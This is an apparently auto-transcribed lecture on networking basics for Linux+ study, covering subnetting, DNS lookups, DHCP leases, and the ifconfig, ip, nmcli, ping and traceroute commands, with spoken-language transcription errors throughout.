or something like that a tablet that would be one their TVs that would be uh if they have any Smart TVs sprinkled around the office so on and so forth so for the most part you’re going to have maybe around 50 employees that can reside in a network that like that looks like this but anything more than that they would have a larger subnet because there’s just multiple devices per employee per person and so you just need more than 254 potential addresses and this is how subnet masks and the calculations of those hosts work when a device connects to a network it is assigned an IP address this address can either be ipv4 IPv6 depending on the Network’s configuration subnetting helps organize the network by breaking it into smaller segments making it easier to manage and enhance security by isolating different parts of the network from each other so this is the whole purpose behind it number one to make it easier to manage and enhance the security by isolating different parts of the network from each other so uh when you have multiple subnets it makes it easier for you to find out which host was uh for example uh exploited and which host was hacked into and because they reside in their own little segment they won’t affect the rest of your network and it can be contained uh within that specific segment it can be 
isolated within that segment the domain name system is the next level up when it comes down to addressing so it’s basically the phone book of the internet typically domain names are related to actual websites but each website actually has an IP address as well so what happens is that most people aren’t going to remember the IP address for the website so you the IP address for Google for example is whatever the series of numbers are but you’re not going to remember that but you will remember Google so you can remember example.com in this case but example.com actually is pointing to an actual IP address right so even websites have IP addresses web servers web applications all of these things actually have IP addresses if they are connected to the internet but for the most part people aren’t going to remember the IP address most people aren’t that good with numbers but they are fairly good with names everybody can remember facebook.com they won’t remember the Facebook IP address but they’ll remember the version of that IP address which would be their domain name and so the do domain name will go through the DNS uh Port as well as the domain name system protocol right and so this is how IP addresses get translated into domain names now how DNS works is that when you type something into your browser the computer needs to find the IP address that’s connected to that actual name the domain name so because they’re most uh easier for us to remember and we enter that the computer how works with the individual IP addresses so it needs to resolve that domain name to some kind of an IP address so what it does is that it’ll send out a query right so it’ll looks like this right you will put your uh input as the user you’ll enter a domain name and that’ll be example.com and you’ll put that into the browser you press enter and then the resolver of the DNS in the computer sends a query right the computer will send send the query to the DNS resolver the resolver is typically provided by the ISP the internet service provider and then the if the resolver doesn’t actually have that in its cache so if you don’t have it stored in your cache or if the ISP doesn’t have it stored in its cache then it performs an actual lookup and it finds it for you and then it stores it right so it’ll query multiple DNS servers to find the correct IP address and then once it finds that IP address address it will resolve it and it’ll connect that IP address to the domain name so that the next time that you go and enter that name it’ll just load it for you quickly if you clear your cache then it’ll perform that process all over again the next time that it goes through the search for the DNS resolver right so you enter something the computer will send that query to the DNS resolver that’s typically with the internet service provider so AT&T for example it’ll send it to AT&T’s DNS resolver and the AT&T’s DNS resolver will go through its database of all of the IP addresses that are connected to domain names and if it has it in there it’ll just send it and uh it’ll send you to the website that you’re trying to go to if it doesn’t have it it does a recursive look up and it try to find what that IP address is connected to or what that domain name is connected to and then it’ll load that IP address onto your browser all of this happens in a matter of a second or two depending on how fast your internet services so all of these things happen very very quickly um and you don’t really see them in the foreground all you see is you typed in the 
IP address you pressed enter a second or two later a website loads but this is what’s happening in the background the DNS server hierarchy um is connected via the uh the resolver itself so the resolver will contact one of the root DNS servers and these are at the top of the DNS hierarchy so these are the actuals and the orgs and the Nets so these servers are at the top of the DNS hierarchy and they direct the query that DNS query that you made to the appropriate top level domain server which would be any of these guys so if it’s a website it’ll go to that domain server and then from that list of domain names it’ll find the IP address if it’s a.org it’ll go to that server and from that list will pull whatever it is right so there are individual uh servers typically because the fact that there are literally probably billions of domain names at this point as well so there’s a bunch of different dos. org.net now there’s doco and. us. coffee there’s a bunch of different top level domain names now so because of the fact that there is so many different variations each one of them are going to have their own server and then when you send that query that query is going to go to the appropriate server so that it can find the domain names and this is mainly to make the process a little bit faster if they were housing doc.org domnet and every other top level domain name if they were housing all of those things on one server at AT&T it would probably take a much longer amount of time for that domain name to be pulled up and for that IP address to be found so the TLD DNS server um once they’re contacted if you’re looking for example.com it would find the cont I already explained all this so I’m just going to I’m just going to Breeze through this particular portion I got a little bit ahead of myself but again so so if you’re looking for the com it’ll go to the contact of theom TLD server and it it’ll direct the query to that specific authoritative dnf server to get you example.com the authoritative DNS server which is the final step of this whole thing is the one for this particular example for example.com these servers um host the actual domain name itself and then they have the actual DNS records that map that to the IP address and then that’s where the data gets pulled so it goes from the the top level server the TLD server it’ll find that and then from there It’ll point to the authoritative DNS server that’s actually hosting that domain name and that could be at AWS it could be at GoDaddy or a variety of different hosting providers um once it is found and once the data has been pulled it returns that to you right it sends it back to your computer and then it just uh populates it onto your browser so that you can actually look at whatever you want want to look at and watch the video or watch Netflix or all these things so all of this stuff is happening so that you can get access to the data that you want to get access to so to give you a visual representation of everything that we just talked about typically these things are a little bit easier when you look at kind of the flow of it like this right so on your computer you would look for self-repair apple.com so selfrepairing which would be uh either the cache that you have on your computer the cache and host file that you can see on the left right here or it’ll be with your ISP right so if that doesn’t exist uh if you don’t have it if you haven’t checked it then what’s going to happen is that this local DNS server is going to send that question out 
it’s going to send that query out and it’s going to say where is this place where is this location what’s the IP address of this place and it’ll go to the root server and in the root server says I have no idea try the authoritative server for the people right for all the dot domain names and the authoritative server is going to be at this particular location so that gets sent back to the local DNS server local DNS is like all right fine you don’t know so I’ll go to this guy and this would be the Doom top level domain authoritative DNS server so it’ll go to those guys and it’ll say hey where is this thing and they’re like I have no idea why don’t you try apple right why don’t you try the actual Apple server so that you can find out what the the self-repair apple.com location for that IP address is so that would be the TLD authoritative servers response and then that comes back and then the local DNS is like okay fine let’s go to Apple so you and every single time you see that this one this one says I don’t know why don’t you look for the dot server that’s hosted at this IP address and then this is like oh okay so let me go to that IP address and they go and then this is the top level domain authoritative server and then this thing sends a respon back I have no idea why don’t you go to this IP address which belongs to Apple and he’s like oh okay fine and it’ll come back and it’ll be like hey Apple where is this particular thing and then Apple says I don’t know why don’t you try the authoritative server for repair. apple.com so now there’s the extra piece that comes in for this and then it says that is housed over here and then finally it sends it over here and it says okay fine hey where is this thing and then this says oh no problem there is no self-re there is no self-d out repair that awful and it’ll send it back and then the website says okay there is nothing and this is where like you probably will get an error or something on the screen that doesn’t load it now if there is something like that then what will happen is that it’ll say oh this is the IP address for it and then it’ll send it to the DNS server and the DNS server will send it to your computer and it’ll load it for you right that’s the process right here this I just think that this is so funny that it send this like it send this on this wild goose chase and you go back and forth and then you’re like oh there is nothing here and it’s like oh Jesus um and so uh presumably right so if this uh particular location was not self. repair. apple.com if it was I don’t know repair. apple.com is it would stop at this portion right it would stop at this place and it would be like yeah okay here’s the IP address for repair. 
apple.com if we were just trying to go to apple.com and you send it Hey where’s apple.com and it’ll say I don’t know why don’t you try a doom server and you’ll come to theom TLD authoritative server and you say Hey where’s apple.com it’ll be like here’s the IP address for apple.com right so it depends on how deep we’re trying to go with this inquiry that we’re making and where we’re trying to land obviously but it goes from your local DNS server it’ll go to the root server the root server will send you to theom tldd server that place will send you to the potential authoritative server for that actual domain name for that actual website right and this is the process of literally everything that we just talked about with this whole DNS part so just to give you that explanation we have the DNS servers which are the specialized servers that are responsible for handling the process of translating a name to an IP address and there are different types of server so you have the DNS resolver that we just talked about which is the recursive resolver and it receives the original query from your computer so that was that thing in the bottom left corner it receives that thing from your computer and it handles the process of contacting everybody else to find that for you and then finally it’ll send you if it finds it it’ll send you to the page that you were looking for from that the DNS resolver from that location it’ll go to the root DNS server which was the thing in the top right and then it’ll say this is the first stop and this is what we’re looking for why don’t you go to the appropriate TLD server which might be.com or might be.org or whatever and then that will go to the actual or.org or.net whatever that top level domain server and then from there it’ll redirect you if it has the address it’ll redirect you if it doesn’t it’ll send you to the authoritative DNS server that will find help you find the other thing but typically this is where it stops so it’ll go from the TLD DNS server and then it’ll say okay go this is the Doom location for the authoritative DNS that you’re looking for and then you can go to this particular place place and these are the servers the authoritative DNS servers are the ones that actually store the records for domain names and provide the final IP address in response to what you’re looking for in that particular case we were trying to go to store.apple.com and then we were trying to go to repair. 
store so that went a little bit further but typically this is where it stops you’ll go from T the TLD server which is like it’s a.org website oh okay I want to go to.org website it’ll send you to that particular authoritative server and then that.org server will say oh okay this is the address for this particular website that you’re looking for it makes it a lot easier so instead of you having to remember IP addresses you just remember a name that’s it that’s kind of one of the biggest benefits of uh DNS right once you get past the user friendliness it becomes scalable so if you wanted to look at all of the freaking devices that are on the internet and the domain names that are on the internet and the IP address that are connected to these domain names on the internet and you want to expand that then you’re looking at scalability so DNS supports all of the massive number and it’s constantly growing so it supports the growing number of devices that people keep buying and they’ll add another TV to their house and all of the domain names that people keep buying so it supports that scalability right that the massive number that keeps growing and gets bigger and then when you’re considering the amount of of queries that are being made to the Internet so imagine how many billions of queries are being made right now as you’re watching this how many millions and billions of people are trying to access millions and billions of locations across the internet when you consider the massive amount of traffic that’s just going back and forth as you’re watching this right now across the internet you need to also consider well these things can’t crash right there needs to be some kind of a a redundancy means there’s a backup server for Microsoft for example so if there initial server there’s some kind of earthquake at the first server’s location and that particular building has a power outage there needs to be a backup server that kicks in immediately so that microsoft.com doesn’t crash and you can still go and access that website that was actually something that happened relatively recently where the Microsoft service um and all of the computers and all the devices that r Li on Microsoft couldn’t work and this was like a couple of months ago it was pretty recent that that actually happened and in that day Microsoft lost over I think $150 million something like this some crazy number that they lost during that one day that they had an outage so this is where redundancies come in this is where reliability comes in the DNS system and the variety of different uh TLD servers so it’s not just one TLD server that has es all of the domains it’s literally dozens of them probably in the hundreds that are across the globe in different locations so just in case one crashes you can go to the another one and you still get reliable connections if you wanted to and just expand that extrapolate that to the orgs and the Nets and all of the different countries and the different cities and so on and so forth this is where redund redundancy is a big deal this is where this structure this hierarchy of structure that’s available is a big deal and it provides that reliability that people actually really need because I mean what would you do without the internet and once you get past DNS once you understand DNS then you go into DHCP which is the dynamic host configuration protocol and this is a network management protocol that’s used to automate the process of configuring devices on IP network so this is essentially what assigns 
the IP addresses to any new device that’s connected to your router to your internet right so when somebody comes and connects to your Wi-Fi this is the protocol that assigns the IP address and any other configuration parameter to that device that just connected to your Wi-Fi so it’s DHCP that assigns the IP address to your Wi-Fi to your to the device that just connected to your Wi-Fi uh the way that it works is that a device like a computer whatever connects to your Wi-Fi it connects to the network when it does that it doesn’t have an IP address so it sends out a discovery broadcast message to a d DHCP server the DHCP server makes the offer and it so it receives that Discovery message and then it responds with the offer message and it says hey here’s the available IP address that we have on our Network and the network configuration information that you need like the subnet mask that’s connected to uh the default gateway that would exist and any DNS server addresses so on so and most people really don’t give a crap about this they just want Wi-Fi so most people really don’t care about this and of course the devices don’t display all of this stuff to the person who’s connecting their cell phone to the Wi-Fi that you say oh I have Wi-Fi connection but what happens is that your cell phone sends out the request and then the DHCP server actually responds with an offer and says this is the IP address that I got for you and these are all of the rules and uh configuration details for our specific Network and then the device receives that offer and responds with an actual request message that says hey I accept the offer that you’ve made thank you for this IP address and thank you for giving me connection to this network and finally the server will acknowledge that request and it’ll say all right cool this is your actual IP address from now on and every time that you connect to me this is the IP address that’s going to be assigned to your particular device and now the device can actually use the internet because it has its official address and it can communicate with the network the vast wide network of the internet the worldwide web there are a lot of benefits to this obviously right so it simplifies the network setup imagine if you had to be the one to assign an IP address to every single device that connected to your network and believe it or not at a certain point in the history of the internet this was actually the case and people had to manually assign IP addresses to the computers and to the devices that were connected to the network so uh especially when you have a massive Network where configuring each device would not be possible which is what Microsoft has or what Amazon has they have literally tens of thousands of employees so imagine if somebody had to sit there assigning IP addresses that would be like a full-time 247 type of a job so um it avoids the conflict of addresses this is the other piece that is uh very much prone to human error right so somebody might forget that oh shoot I already assigned this address to this other device and now I can’t reuse this address and now I got to go do this other thing and try to find a new address own and so forth the DHCP protocol the the uh system itself just keeps track of all these things and avoids any conflict so it assigns an actual unique address to the person or to the device that’s being connected to the network and then there’s the management of the IP address so um people want to use their IP addresses uh efficiently if there’s any 
kind of a security issue or a disconnection from the network the IP address can be resigned to another uh reassigned excuse me to another device um if it has to do anything with uh firewalls which we’re going to get into a little bit as well it helps with the management of IP addresses and blocking or meaning denying access to the network via the IP address or allowing access to the network so on and so forth so it’s the management of these IP addresses that comes in um and again it has to do a lot with uh networks that have a lot of temporary or what they call transient devices so if you go to a uh a coffee shop Wi-Fi hotspot right so if you go to a coffee shop and you’re connecting to that Wi-Fi that specific Wi-Fi at that coffee shop has probably seen tens of thousands of devices that just roll through and they’re there for just one day because they need Wi-Fi and then they leave you know the person came into town for a trip and then they left and they’re never going to visit that uh Wi-Fi spot again but that IP address that was temporarily assigned to that person now needs to be freed up so that it can be assigned to somebody else right so this is how these transient devices or these temporary devices get managed through the DHCP protocol and this is very important to understand especially when you just go into a large Enterprise environment these are the types of things that are very very useful so when you’re thinking about the management of IP addresses what assigns the IP address inside of the network that would be the DHCP protocol what assigns the the name to an IP address that would be the DNS protocol right what types of IP addresses are there ipv4 and IPv6 right so these are the key things that you need to remember when it comes down to the networking fundamentals when you go further along with this the DHCP lease is basically the time the the temporary amount of time that that IP address will be assigned to that given device right so in a public Wi-Fi environment to the DHCP lease time is obviously way less than your personal home internet so when the lease time is about to expire the device has to renew the lease by sending a new request to the DHCP server and then the DHCP server will send the offer um if it stays connected to the network the server typically just renews the lease which extends the time that the address is assigned so that you don’t have to get a new IP address every single time for your laptop to be connected to your home Wi-Fi right so if it’s constantly connected to it or it’s connected uh perpetually like you never take your desktop computer out of your house it stays right the laptop might be put in your backpack and it’ll leave and it’ll come back but the desktop will never get disconnected from that Wi-Fi so in that particular ular case it’ll just renew the lease and it’ll just keep granting access to that particular IP address but when your friend comes over and that you don’t see them for the next 3 months or 6 months or whatever that lease time will lapse and then they’ll need to reapply they’ll need to submit a new request to the DHCP protocol the DHCP server so that they can get assigned a new IP address when they come back to your house so as a summary DHCP streamlines Network management it assigns IP addresses to devices making sure that the IP addresses and any conflicts and everything are all handled without you even having to worry about it um it also simplifies the process of connecting devices to a network by making sure that the network 
efficiency is overall uh just running smoothly it it’s enhanced and again you just don’t have to worry about it all of these things happen behind the scenes you don’t even think about these things for the most part if you don’t know anything about networking you probably have never even heard of this and you are like oh wow I didn’t know all this was happening but yeah there’s something that assigns the IP address to somebody that gives them access to your Wi-Fi and that is called DHCP all right now we need to address what a network interface actually is so the interface configuration uh Legacy meaning the old school version and actually this is what’s running on my current Macbook so this is not uh Legacy in the regard that it’s no longer being used there’s still a lot of conf uh computers that use if config um but this is the interface configuration that happens with this particular tool or command so I have config uh short for the interface configuration is a command line utility that is used to configure your network interfaces on Unix based operating system so for example Linux or Mac OS um it connects it it creates those interfaces it configures the network interfaces to the actual IP address so it’s been deprecated supposedly um but it’s uh still very much in use so but when I try to run this just to test on my MacBook uh and I ran IP uh it didn’t work it said IP doesn’t exist when I ran if config if config worked so uh it’s not as deprecated as they make it sound and it’s still very much in use um when you go to Windows if config is IP config and it serves the same exact purpose the simplest version of the command is to just type if config and press enter and it’ll lists all the network interfaces that are on your system along with all of the current configurations meaning the IP addresses that are assigned to them if there are any network masks or broadcast addresses and everything else that would be appropriate for that particular configuration this is an example output right here so eth0 is the actual interface in question these are all the flags that are attached to it so it’s up and running it has the broadcast so on and so forth multicast um the inet IP address for this is this piece right here the network mask for it is this so this is the subnet mask that we were talking about and this is the broadcast IP address that’s assigned to this particular Network right so this is the this is just a sample of the output of what would happen when you ran if config now if you wanted to configure the IP address then you would do pseudo if config and then that specific interface that we were just talking about and then the IP address that you would want for it and the net mask that you would want and then you would do up to just make sure that the IP address has been assigned to it and the subnet mask is what it is and then the up keyword brings the interface up meaning it actually activates it right so if you wanted to take it down you would just type down but this is a configuration command so you say uh this specific IP address is what I want to assign to this particular interface and I want it to be on this type of a subnet mask and I want it to be up I want it to start running right so this is what uh how you actually configure something like that you don’t have to necessarily do it because typically the DHCP protocol will do it for you but in case you actually need to do it manually then this is what it would look like to configure an IP address manually for any given interface 
Breaking down that command in detail: sudo runs the command as the superuser, which is the administrator privilege. eth0 is the network interface you want to configure; it could be any interface on your system, eth1 for instance, though typically not lo, the loopback (local host) interface, which you would normally not modify and which ends up having the same exact IP address on every single machine: 127.0.0.1. Then comes the IP address we are assigning to the interface, then the network mask (the subnet mask) we are assigning, and then up to activate the interface and make sure it is running.

Just as you can bring an interface up, you can shut it down, deactivate it essentially, and you can do this without configuring any addresses at all. If you just want to make sure a particular interface is active, you run sudo ifconfig eth0 up; if you want to take it down, you run sudo ifconfig eth0 down. These control the state of the interface itself: bringing it up activates it, taking it down deactivates it.

In conclusion and summary: ifconfig is supposedly deprecated, but it clearly is not, because it is active and running on my MacBook right now. It remains a widely recognized tool for managing network interfaces on Unix-based systems, and it allows you to view interface configurations, assign IP addresses, and control the state of interfaces. That is what ifconfig does.

ip is the modern replacement for ifconfig. It is part of the iproute2 package, and it does basically everything we just talked about with ifconfig, except the command in this case is ip. You just type ip a, or the longer ip addr, and press Enter, and it displays all the network interfaces, very similar to what ifconfig would do, including the IP addresses, MAC addresses, and any other relevant detail. The example output looks very similar to what we covered previously. The loopback interface is at the very top, and as I mentioned, on every single device I have scanned or pen tested, the loopback IP address is the same; it is universal across every machine I have ever messed with. Then there is eth0, the actual interface that gets assigned an IP address on your local network, shown with the actual IP address for this particular machine, the broadcast address, and the MAC address. (I believe the dotted netmask is not shown in this particular example; as we will see, ip expresses it as a /24-style prefix on the address instead.)
That MAC address is the hardware address physically tied to the Ethernet adapter. MAC addresses can be spoofed, which is a whole other conversation; they are not permanent, and neither are IP addresses, which can also be spoofed (any time I think "MAC address" I think "MAC address spoofing"). In any case, this output is very similar to the ifconfig output, and in a lot of cases when I run ifconfig I also see the MAC addresses of my devices in its output, so that detail is not limited to the ip command.

Assigning an IP address is very similar to what we did with ifconfig: sudo ip addr add, then the IP address with a /24 suffix, then dev eth0 to attach it to the eth0 interface. What we are doing is assigning that IP address with a 24-bit subnet mask, meaning the first three octets are assigned to the network and the last octet is assigned to the host. And instead of showing 255.255.255.0, it is the /24 piece on the end of the address that tells us what the subnet mask is: the network part is 24 bits, which is three full octets.

Breaking it down: sudo runs the command as administrator; ip addr add indicates we are adding an IP address; next is the IP address we are adding, with a subnet mask of three octets (24 bits); and dev eth0 attaches it to the interface. For the most part, in my experience, eth0 is also the interface name assigned to the very first address your computer gets.

The overall concept of bringing an interface up or down, basically activating or deactivating it, also applies here; the command is just a little bit different: ip link set eth0 up or ip link set eth0 down. up obviously activates and down deactivates, but you are addressing the interface a little differently, through its link: you are saying, set this particular interface up, or set it down.
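Collected as a hedged sketch (the address and interface name are example values):

```bash
# Show all interfaces with addresses, MAC addresses, and flags
ip addr

# Add an address with a 24-bit (/24) prefix to the eth0 interface
sudo ip addr add 192.168.1.50/24 dev eth0

# Activate or deactivate the interface through its link
sudo ip link set eth0 up
sudo ip link set eth0 down
```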
Displaying the routing information is mostly done so that you know what paths network traffic takes to reach various destinations. It includes information about the default route, the specific routes, and the interfaces being used. It is mostly used for network connection troubleshooting, to see whether any individual connection along the path the traffic takes to reach its destination is glitching, though the same information can also be used for security analysis and pen testing. The ip route command displays the routing table, which shows the paths network traffic will take, and I will break the sample output down in a little more detail. I do not think this depth is actually inside the scope of the Linux+ studies and examination, but it gives you a good idea of what you are looking at, so that your networking knowledge is a little bit stronger.

So let us look at what each element represents, segment by segment. The first portion is default via 192.168.1.1 dev eth0. default indicates the default gateway, which is used when no specific route for a destination is found in the routing table. via 192.168.1.1 specifies the next-hop address, the IP address of the default gateway router that the traffic will be sent through. dev eth0 indicates the network interface the traffic will be routed through. Put together, the line tells the system: send any traffic that does not match a specific route in the routing table to the default gateway at this particular IP address, using this particular interface.

The next line is the specific route. Its first portion represents a route for the IP address range 192.168.1.0 through 192.168.1.255, where /24 is the subnet mask, which you should already recognize by now. dev eth0 associates the route with the eth0 interface itself. proto kernel signifies that the route was added by the kernel (and we should know what the kernel is by now), usually as a result of configuring the network interface. scope link indicates that the route is valid only for directly connected hosts on the same link, meaning the local network: this route only applies to devices connected to the same Wi-Fi, the same network, that this particular device is connected to. And the line ends with src followed by the source IP address, the address to be used when sending packets to this particular subnet.
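Putting that on the command line as a hedged sketch; the output shown is representative of the slide's example, with the device's own source address as an illustrative placeholder:

```bash
# Print the kernel routing table
ip route

# Representative output (addresses are illustrative):
#   default via 192.168.1.1 dev eth0
#   192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.100
```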
So, reading the whole table from the top: the gateway line says "this is the address I will hand off-network traffic to," and the subnet line says "here is a specific route for the local network or Wi-Fi we are located on," ending with the IP address of the actual device. That src address is not to be confused with the gateway address: the first IP was for the default gateway, while src is the IP address of this particular device as it communicates with the network. Combining both lines: traffic for any unspecified destination (the default route) will be sent through the gateway at that address via that interface, and traffic specifically destined for the local subnet will be routed through that interface using the IP address assigned to it. This might be a little confusing, a little overwhelming; we are not doing Network+, or at least not at this depth. I just wanted you to see what the output of the ip route command represents.

So, once more in summary: even though ifconfig is supposedly deprecated, it remains a widely recognized tool for managing network interfaces on Unix-based systems; it lets you view and manage interfaces in very much the same way ip does.

Next on our list of tools is the Network Manager command line interface, nmcli. As the name implies, it is a command line tool, and it helps you manage network connections on Linux systems. It interacts with NetworkManager, a system service for managing interfaces and the connections on those interfaces. It is commonly used in desktop environments and provides a convenient way to configure and control network settings without a graphical interface.

Here are some of the commands. If you want to look at the active connections on your network, you type nmcli connection show, and it shows all the active network connections on your system: the connection name, the UUID for each, the type of the connection, the device associated with each connection, and so on. In the example output you have the names (the wired connection and the Wi-Fi connection), the UUIDs for both, the type (ethernet for one, wifi for the other), and then the device IDs: eth0 for the wired connection and the WLAN device for the Wi-Fi, for this particular set of network connections.

If you want to configure a static IP address using nmcli, you go through the modify command. Static IP addresses are addresses that do not change, a permanent assignment. So: sudo nmcli connection modify, the connection for this particular interface, then ipv4.addresses with the IP address to assign and its /24 subnet mask, which is three full octets, 255.255.255.0. The command assigns a static IP with a /24 subnet mask to the network connection eth0.
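A hedged sketch of those two commands; the connection name and address are placeholders (on many systems the connection is named something like "Wired connection 1" rather than the device name), and in practice you would usually also set ipv4.method to manual and re-activate the connection for the static address to take effect:

```bash
# List active connections: NAME, UUID, TYPE, DEVICE
nmcli connection show

# Assign a static IPv4 address with a /24 mask to a connection
# ("eth0" and 192.168.1.50/24 are example values)
sudo nmcli connection modify eth0 ipv4.addresses 192.168.1.50/24
sudo nmcli connection modify eth0 ipv4.method manual
sudo nmcli connection up eth0
```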
Here is the breakdown: sudo runs it as administrator; nmcli connection modify indicates we are modifying a network connection; then comes the particular connection we are going to configure; then the IP address and subnet mask we are assigning, as an IPv4 address; and the /24 represents the number of network bits, so 24 divided by 8 is 3 octets, meaning 255.255.255.0. I am just repeating things you should know by now.

If you want to enable or disable connections, it is very similar to everything else we have done, using the up and down keywords: sudo nmcli connection up for a particular connection, or sudo nmcli connection down, brings the connection for that interface up or down, activating or deactivating it.

If you want to view the status of your devices, you run nmcli device status, and it displays the status of all your network devices: connected, disconnected, or unavailable. In the example output you can see the devices: the Ethernet device is connected, the Wi-Fi device is connected, and the loopback (the local host) is not currently being managed.

If you want to list all the Wi-Fi networks available to your device, and this can be a really big list depending on how big your building is and who is around you, you run nmcli device wifi list. It lists the available Wi-Fi networks with their SSIDs, signal strength, security type, and so on. In the example output, the SSID is essentially the name of the Wi-Fi: MyWifi, AnotherWifi, then the AT&T and Spectrum networks, and so on. Then there is the mode, the channel it is on, the rate (its speed), the signal (a signal of 70 means a stronger signal and a stronger connection), bars (another way of visualizing signal strength), and the security, WPA2 in this case. WPA2 is one of the more common modern Wi-Fi encryption standards and is far more secure than the legacy, outdated versions of Wi-Fi security.

If you want to connect to one of those networks, you run sudo nmcli device wifi connect with the SSID, which is essentially the name, and then the password, because more often than not you actually need the password to connect to a Wi-Fi network. It connects to that Wi-Fi using the SSID and password you provided. In usage, you replace SSID with the actual name of the Wi-Fi, MyWifi in this example, and you replace the password placeholder with the actual password for that Wi-Fi network.
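As a combined hedged sketch (connection name, SSID, and password are all placeholders):

```bash
# Activate or deactivate a connection ("eth0" is an example name)
sudo nmcli connection up eth0
sudo nmcli connection down eth0

# Show the state of every network device
nmcli device status

# List nearby Wi-Fi networks: SSID, channel, rate, signal, security
nmcli device wifi list

# Join a network ("MyWifi" and the password are placeholders)
sudo nmcli device wifi connect "MyWifi" password "s3cretpass"
```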
In summary, nmcli provides a powerful command line interface for managing network connections on Linux systems. It allows you to view and modify connections, assign static IP addresses, control connection states, and of course manage Wi-Fi networks. That is the power of nmcli.

Now on to troubleshooting. ping is a very useful utility. It is used to test the reachability of a host, a computer or a server: you ping the IP address, or you ping the website, and you can also measure the round-trip time for the messages sent to it, to establish how strong the connection is and how quick that particular host is to respond to you. You literally just type ping and give it the IP address, and what it does is send a series of Internet Control Message Protocol packets, ICMP packets. Any time you see ICMP, think ping. There is also something called an ICMP flood, which is actually a way to perform a DoS (denial of service) or DDoS attack: by flooding a host with a huge number of ping requests, you may take it down and put it out of service. So this is something you will see regularly: ICMP is associated with ping, so if you see ICMP, that means somebody is pinging.

ping sends the request to the specified destination, either the hostname or the IP address of that host, and the response you receive tells you whether that thing is up. Typically, if it is not up, it responds with some kind of "host is down" message or similar; if it is up, you get replies along with the amount of time it took for each round trip to be established. The round-trip time (RTT) is the measurement of the time it takes for the echo packet to actually reach the host and for the reply to come back to you: the round trip, very simple to understand. Packet loss is the number of packets that were sent but got lost somewhere in the process, due to the network connection or other issues: if a packet was sent and never came back, or was sent and never received, it was lost in transport, so to speak. ping reports that back to you as well, and it helps you understand the strength of the connection to that particular host and how reliable it is.

The basic usage looks like this: ping followed by the hostname or the IP address, so ping google.com as an example, or ping with some IP address directly. For the most part, the reason we use ping is just to see whether a host is actually up, and when it is up, the result looks like the example output: "64 bytes from" that host's IP address, with response times of 12.3 milliseconds, then 11.8, then 12.1. That is exactly what it looks like when a host is up; when it is not up, you will not see anything like this.
Instead it will typically say the connection was not available or the host is down, something along those lines. And note that when a host is up, those reply lines just keep coming, one every second or two, because unless you tell ping how many packets to send, it runs until you stop it, which you do with Ctrl+C.

Here is the breakdown of what we just saw: "64 bytes from" the IP address is the reply we received from that address, Google's in this case; the sequence number of the packet starts at zero and increments by one each time; the TTL is the time-to-live value, indicating the maximum number of hops the packet can take before being discarded; and then the actual time, the round-trip time for that packet to be received.

So if you want to stop it, you press Ctrl+C, which cancels the request, unless you said up front that you wanted to send, say, ten or five packets just to make sure the host is up, which is done with -c, for count. Then it runs, and after that many packets it stops on its own; but if you just run ping google.com by itself, it keeps running until you stop it with Ctrl+C. Among the additional options, -c is that count: you specify the number of packets to send, and after five packets, say, it stops pinging. You can also set the interval between packets with the -i option, giving it the number of seconds to wait. This matters if you do not want to show up on someone's intrusion detection system as a constant source of pings: having ping wait 5 or 10 seconds between packets still confirms you have a live connection, but it will not register on their IDS, their network intrusion detection system, as somebody massively pinging them to see whether they are up, whether they have service.

There are some more options here too. We were talking about flooding: the -f option floods, meaning ping sends as many packets as fast as it possibly can, and the millisecond gaps you saw become much, much smaller. A massive flood of packets would be sent to google.com in this example, and I do not think Google would even care, but this is typically done either to test a host's ability to handle a flood of traffic or to actually mount a denial of service attack and stop it from operating.

In summary, the ping command is a vital network troubleshooting tool: it tests the connection between devices and confirms that a device is actually up; it measures the time it takes for packets to go back and forth, to see how reliable the connection is; and if there is a network issue, it reports the packets lost in the process, the length of time packets take to be sent and come back, and of course the status of the connection, meaning whether the host is actually up and whether you can send a ping to it and receive something back.
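These are the standard Linux ping flags just described, gathered into one sketch:

```bash
# Ping until interrupted with Ctrl+C
ping google.com

# Send exactly 5 packets, then stop (-c = count)
ping -c 5 google.com

# Wait 5 seconds between packets (-i = interval)
ping -i 5 google.com

# Flood: send packets as fast as possible (requires root)
sudo ping -f google.com
```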
traceroute is the type of tool that helps you track the route a piece of traffic, a packet, takes to reach a particular location. When you run it, it sends a series of packets to the destination IP address while gradually increasing the time-to-live (TTL) value, which determines the maximum number of hops, meaning the number of internet routers, the packet can traverse. When you send something out, it goes through multiple internet routers before it actually lands at its destination, and it is rarely ever the same number of hops: it could be one hop, it could be ten, it just depends.

The TTL value starts at one, so the first packet travels only to the first hop before it gets discarded. With each packet that goes after that, the TTL is incremented by one: the second run makes two hops before being discarded, the third run makes three hops, and so on. The hops, again, are the connections to the routers, the intermediary connections, before the packet actually lands at its final destination.

When a packet is discarded due to the expiration of the TTL, the router that dropped it sends an ICMP "time exceeded" message back to you, the source. That message includes information about the router itself, allowing traceroute to identify the hop where the packet was discarded along the way. The process continues until a packet actually reaches the destination and completes its path, and traceroute can then tell you the total number of hops it took to get there. Using the information from each hop, traceroute constructs the route that was taken by the packets.

Again, this is about measuring connectivity: the strength of a network, of your particular host's connection to another host, of your internet connection and routers, and how long it takes for something to get through. If packets have been discarded along the way, that is something to think about, and if too many packets are being discarded, that is a red flag saying: we need to troubleshoot this connection, because for whatever reason we are dropping a lot of packets. When paths do complete, traceroute records that information and shows you how many of the packets sent out actually reached the destination.

Running it is very similar to running the ping command: traceroute google.com, for this particular example, or traceroute followed by an IP address. It starts sending packets out and tracking the number of hops each one takes, whether those packets get discarded along the way, and whether the connections are actually being established.
And when packets do reach the final destination you want, traceroute shows you the route it took and how many hops were needed to get there.

When you run it, the output looks like the sample shown, and one clarification is worth making here: each numbered line corresponds to one hop (one TTL value), and the three times on each line are the round-trip times of the three probe packets sent to that hop; the times tend to grow down the list because each hop is farther away, not because more packets are being sent. So the first line is the first hop, with probes of roughly 1 ms, 0.789 ms, and 0.699 ms in this example; the second line is the second hop with its three times (1.62 ms and so on), a little longer; and the third line likewise. Breaking that down: the IP address at the beginning of each line is the address of that hop's router, and the first hop's round-trip times are the shortest we get because it is the nearest. The lines after it are the IP addresses and round-trip times for each of the hops along the path. In this particular run it took three hops and stopped, landing at the destination, 142.250.74..., Google's address in this case. Three hops from us to them is very short, to be brutally honest; more often than not you will see a couple dozen, maybe twenty-something hops, with data points for each router the traffic was connected to before it finally landed at the location you wanted. So it traces the route your traffic took from your gateway to the actual IP address of Google in this case.

